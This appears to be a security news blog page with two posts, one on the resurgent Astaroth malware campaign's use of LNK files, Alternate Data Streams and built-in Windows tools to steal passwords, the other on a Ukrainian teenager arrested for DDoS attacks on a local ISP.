Search This Blog

Showing posts with label Data Management. Show all posts

Windows 10 Users Beware! Astaroth Malware Campaign is Back and More Malicious!


A malware group that goes by the name of ‘Astaroth’ has re-emerged stronger and stealthier than before. This group has been known for exploiting Microsoft Windows tools to further the attack.

Microsoft had gotten aware of these methods and exposed the malware group and its “living-off-the-land” tactics. But the malware resurfaced with a hike in activity and better techniques.

Reportedly, the Windows Management Instrumentation Command-line (WMIC) is the built-in tool that got used the last time as was spotted by the Windows Defender ATP.

Per sources, the analysis done by Microsoft led to the discovery of a spam operation that spread emails with links to websites hosting a “.LNK” shortcut file which would instruct the WMIC and other Windows tools to run “fileless” malware in the memory well out of the reach of the anti-malware.

Sources indicate that having learnt from mistakes, Astaroth now entirely dodges the use of the WMIC. January and February showed a rise in activity.

According to sources, the new styled campaign still commences with a spam email comprising of a malicious website hosting link, LNK file but it the new version it employs a file attribute, “Alternate Data Streams” (ADS), that lets the attacker clip data to a file that already exists so that hiding malicious payloads gets easier.

Per source reports, the first step of the campaign which is a spam email reads, “Please find in the link below the STATEMENT #56704/2019 AND LEGAL DECISION, for due purposes”. The link is an archive file marked as, “Arquivo_PDF_.zip”.

It manipulates the ExtExport.exe to load the payload which per researchers is a valid process and an extremely unusual attack mechanism.

Once the victim clicks on the LNK file with the .zip file in it, the malware runs an obfuscated BAT command line, which releases a JavaScript file into the ‘Pictures’ folder and commands the explorer.exe that helps run the file.

Researchers mention and sources confirm that using the ADS permits the stream data to stay unidentifiable in the File Explorer, in this version Astaroth reads and decrypts plugins from ADS streams in desktop.ini that let Astaroth to rob email and browser passwords. It also unarms security software.

Per sources, the plugins are the “NirSoft WebBrowserPassView” tool is for regaining passwords and browsers and the “NirSoft MailPassView” tool is for getting back the email client passwords.

This is not the only legitimate tool Astaroth exploits. A command-line tool that goes by the name of “BITSAdmin” which aids admins to create download and upload jobs with tracking their progress is exploited to download encrypted payloads.

Reportedly, Astaroth has previously wreaked havoc on continents like Asia, North America, and Europe.

Teenager Arrested for DDoS Attack in Ukraine


Ukranian Police arrested a 16 yrs old teenager last month on charges of attacking a local Internet Service Provider (ISP) to gain personal information about the users. The police (Ukranian) says that the teen used the technique of DDoS (distributed denial of service) attacks to take down the local ISP. This happened after the local ISP refused to give the teenager the details of the user. The severity of the attack made the ISP contact law enforcement last year to resolve the issue.


"The officers at Ukraine Cyber Police hunted down the 16 yr old attacker in the city of Odesa in January," said the spokesperson for the Ministry of Internal Affairs in a conversation with ZDNet. We explored the teen's home and confiscated all the devices. Upon investigation, the teen was found guilty of the attack. According to the authorities that conducted the preceding inspection of the defendant's system, the authorities found software that the teen used to launch the DDoS attacks. Besides this, details of 20 different accounts related to distinct hacker forums were also found," said the Cyber Police of Ukraine in a statement.

 As per the Criminal Law of Ukraine, the person found guilty of DDoS attack faces imprisonment for up to 5 yrs in jail. However, the teen is not charged for the attempt of extortion to the ISP. The Ukrainian Police has denied releasing any further information regarding the case. It has also not disclosed the person affected by the DDoS attack saying, "the investigation is still in process." It is not the first incident where a DDoS attack was performed to steal user information.

 In several other cases, the hackers were able to take down the ISP network using a simple technique like DDoS Botnet. Other instances similar to this case appeared in countries like Cambodia, Liberia, and various other countries in South Africa. As per the observations, to perform attacks on massive scales of Junk Traffic, the hackers use DDoS Botnet, which is very capable. This happened in Liberia. Carpet Bombing is another efficient technique to perform such attacks (as per the incidents that happened in South Africa).